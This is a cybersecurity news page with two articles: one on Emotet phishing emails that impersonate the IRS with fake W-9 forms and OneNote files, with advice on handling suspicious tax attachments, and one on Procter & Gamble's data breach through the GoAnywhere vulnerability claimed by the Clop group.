IRS Tax Forms Pose Malware Threat, Experts Warn - 1

IRS Tax Forms Pose Malware Threat, Experts Warn

  • Written by Ari Denial Cybersecurity & Tech Writer

According to cybersecurity experts at Palo Alto Networks and Malwarebytes, hackers often impersonate the IRS in their efforts, and they have recently uncovered two distinct phishing campaigns using varied methods.

A phishing campaign discovered by cybersecurity researchers reveals that hackers are sending fake W-9 tax forms through email, impersonating the IRS. However, the form is a disguised Emotet malware, capable of stealing sensitive information from infected endpoints and propagating itself. The Emotet malware can also serve as a dropper, enabling attackers to distribute various other types of malware, such as ransomware.

Following Microsoft’s decision to block macros in downloaded Office documents by default, Emotet adopted a new strategy, utilizing Microsoft OneNote files containing embedded scripts to install the malware.

When initiating the embedded VBScript file, Microsoft OneNote will alert the user of the possible malicious nature of the file. However, it has been observed that many users tend to disregard these warnings and proceed to run the files, as evidenced by past experiences. Upon execution, the VBScript downloads the Emotet DLL and triggers its operation via regsvr32.exe.

If you receive an email requesting W-9 or other tax forms, it is recommended that you scan the documents first with your local antivirus software. However, as these forms contain sensitive information, it is not advisable to upload them to cloud-based scanning services like VirusTotal.

Typically, tax forms are disseminated in the form of PDF documents rather than Word attachments. Therefore, if you receive a tax form as a Word attachment, it is advisable to refrain from opening it and enabling macros.

It is highly unlikely for tax forms to be distributed as OneNote documents, so it is recommended that you delete the email immediately and avoid opening it if you receive one.

News Heading - 2

Procter & Gamble Admits GoAnywhere Bug Breach in Latest Cybersecurity Incident

  • Written by Ari Denial Cybersecurity & Tech Writer

Procter & Gamble (P&G) has confirmed a suspected breach caused by Fortra’s GoAnywhere vulnerability. They revealed that “one of the many companies” was indeed victimized, and that the attackers managed to obtain “some information” about the company’s employees. The nature and extent of the information obtained have not been disclosed by P&G at this time.

P&G has clarified that the attackers were unable to access the financial or social security information of their employees, although some of their data was stolen by the attackers.

Clop, a ransomware syndicate reportedly linked to Russia, has claimed responsibility for breaching dozens of organizations through a zero-day vulnerability found in Fortra’s GoAnywhere-managed file transfer software. The group announced on its dark web blog, naming several high-profile victims including Shell, Hitachi, Hatch Bank, Stanford University, Rubrik, Virgin, and many others.

According to reports, the Clop ransomware group exploited a vulnerability in the GoAnywhere software that allowed the attackers to gain unauthorized access to sensitive data. The group then reportedly demanded ransom payments from the affected organizations in exchange for the decryption of the stolen data.

The scale of the attack is still unclear, and it is currently unknown how many organizations were affected. However, the fact that several high-profile companies and institutions were named as victims is causing concern among cybersecurity experts.

The affected organizations are yet to disclose the impact of the breach on their operations and customers. However, this incident serves as a reminder of the persistent threat posed by ransomware groups and the need for organizations to remain vigilant and proactive in their cybersecurity measures.

According to P&G, the company became aware of the incident in early February and promptly initiated an investigation. As a precautionary measure, P&G disabled the use of Fortra’s services and informed their employees about the cyberattack.

P&G confirmed that there is currently no evidence to suggest that customer data was impacted by the issue. Furthermore, they have reassured stakeholders that the company’s business operations are proceeding as usual.